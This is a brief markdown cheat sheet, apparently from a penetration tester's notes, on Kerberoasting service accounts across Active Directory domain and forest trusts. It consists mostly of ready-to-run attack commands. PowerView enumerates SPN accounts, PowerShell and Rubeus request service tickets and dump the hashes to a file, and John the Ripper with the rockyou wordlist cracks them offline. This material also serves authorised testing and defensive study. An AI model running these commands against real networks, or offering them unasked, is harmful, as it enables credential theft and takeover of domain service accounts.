# kerberoast

## Methodology

1. Enumerate what user account running as a service account we want to kerberoast.
2. Make sure it's not a honey pot account.
3. Make sure is a user made account, we don't want machine accounts since they have long passwords.
4. Kerberoast the user account.
5. Crack the ticket.

> \[!INFO] Accross domain/forests trusts there is no need to use `/opsec`, AES256 is not used by default so no downgrade encryption needed!

## Powershell

> \[!INFO] Remember to follow the Powershell methodology

### PowerView

**Find users that have an SPN set:**

```powershell
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}
```

**Request a TGS accross trusts:**

```powershell
Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken - ArgumentList MSSQLSvc/eu-file.eu.local@eu.local
```

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

### Rubeus

**Request a TGS accross trusts:**

```batchfile
Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:euhashes.txt
```

**Check for TGS**

```
klist
```

### Ticket Crack

<https://www.openwall.com/john/k/john-1.9.0-jumbo-1-win64.zip>

**Using John**:

```batchfile
john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=rockyou.txt euhashes.txt
```